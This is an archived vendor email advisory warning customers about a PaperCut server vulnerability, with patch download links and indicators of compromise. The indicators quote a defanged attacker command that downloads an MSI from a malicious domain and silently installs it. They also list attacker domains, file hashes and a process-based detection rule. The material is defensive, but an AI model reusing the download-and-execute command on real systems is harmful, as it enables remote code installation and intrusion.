[Marketing] PaperCut Vulnerability

Marketing Department mailer at tbsit360.com
Wed Apr 26 19:04:17 UTC 2023 

>From TBS - Today's Business Solutions

View this email in your browser (https://mailchi.mp/d73ed47aa324/papercut-vulnerability?e=8bbedbdd28)

Dear Valued TBS Customer,

We have been made aware of a vulnerability within PaperCut. This vulnerability effects all PaperCut servers through port 9191. Servers which have port 9191 exposed to the outside world are EXTREMELY vulnerable.

We wanted to share with you the attached documents, one from PaperCut and the other, a useful article which provides insight to this issue, which we thought would be useful.
Download Articles PDF (https://mcusercontent.com/bf77172ea6b10a18f6669778a/files/3a9f97a6-fa72-482d-c96e-4fd808de1f97/Papercut_Article.01.pdf)

Please contact our support team to schedule the update. Anyone running PaperCut Version 19 or prior is required to contact our support team.

To email: Helpdesk at tbsit360.com (mailto:helpdesk at tbsit360.com?subject=PaperCut%20Vulnerabilty&body=null)  or call us (630) 537-1370 ext. 2

The links below from PaperCut are for anyone who would like to perform the update themselves.

Links to Download:


PaperCut Version 22

https://cdn.papercut.com/web/products/ng-mf/installers/mf/22.x/pcmf-setup-22.0.10.65997.exe


PaperCut Version 21:

https://cdn.papercut.com/web/products/ng-mf/installers/mf/21.x/pcmf-setup-21.2.11.65657.exe


PaperCut Version 20:

https://cdn.papercut.com/web/products/ng-mf/installers/mf/20.x/pcmf-setup-20.1.7.65660.exe


Anyone running PaperCut Version 19 or prior is required to contact our support team.

IMPORTANT: Make sure to backup your papercut Database before any installation above.

How do I know if my server has been exploited?

We currently recommend looking for the following Indicators of Compromise to determine if it is likely that the vulnerability has been used to install malware on the system. Depending on your systems, logging and endpoint protection software you may be able to detect the following.

• If your security software has raised any alerts or warnings

• If you see suspicious PaperCut MF application log entries, ie:

• User “admin” logs into the administration interface

• Admin user “admin” modified the print script on the printer

• User “admin” updated the config key “…”

• User “[setup-wizard]” modified a config key

• Domains in DNS or web proxy logs:

• upd488[.]windowservicecemter[.]com/download/ld.txt

• upd488[.]windowservicecemter[.]com/download/AppPrint.msi

• upd488[.]windowservicecemter[.]com/download/a2.msi

• upd488[.]windowservicecemter[.]com/download/a3.msi

• anydeskupdate[.]com

• anydeskupdates[.]com

• netviewremote[.]com

• updateservicecenter[.]com

• windowcsupdates[.]com

• windowservicecentar[.]com

• windowservicecenter[.]com

• winserverupdates[.]com

• SHA256 hashes of files on local system:

• setup.msi f9947c5763542b3119788923977153ff8ca807a2e535e6ab28fc42641983aabb

• ld.txt c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125

• Powershell Scripts having similar content to:

```

cmd /c “powershell.exe -nop -w hidden

Invoke-WebRequest ‘hXXp://upd488[.]windowservicecemter[.]com/download/setup.msi’

-OutFile ‘setup.msi’ ”

cmd /c “msiexec /i setup.msi /qn  IntegratorLogin=fimaribahundqf[AT]gmx[.]com CompanyId=1”\\@@

```

• Detection via YARA Rule on SIEM:

```

title: PaperCut MF/NG Vulnerability

authors: Huntress DE&TH Team

description: Detects suspicious code execution from vulnerable PaperCut versions MF and NG

logsource:

category: process_creation

product: windows

detection:

selection:

ParentImage|endswith: \\pc-app.exe

Image|endswith:

- \\cmd.exe

- \\powershell.exe

condition: selection

level: high

falsepositives:

- Expected admin activity

```

If you suspect that your server has been compromised, we recommend taking server backups, then wiping the Application Server, and rebuilding the Application Server and restoring the database from a ‘safe’ backup point prior to when you discovered any suspicious behavior.
Logo

Copyright (C) 2023 TBS - Today's Business Solutions. All rights reserved.
We are in the same industry.
Our mailing address is:
TBS - Today's Business Solutions
7820 S Quincy St
Willowbrook, IL 60527-5534
USA
Want to change how you receive these emails?
You can update your preferences (https://tbsit360.us14.list-manage.com/profile?u=bf77172ea6b10a18f6669778a&id=1c9cbcf45e&e=8bbedbdd28&c=a6bd7e6788) or unsubscribe (https://tbsit360.us14.list-manage.com/unsubscribe?u=bf77172ea6b10a18f6669778a&id=1c9cbcf45e&e=8bbedbdd28&c=a6bd7e6788)
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://moderndatasolusi.com/pipermail/marketing_moderndatasolusi.com/attachments/20230426/79340c1a/attachment.htm>

More information about the Marketing mailing list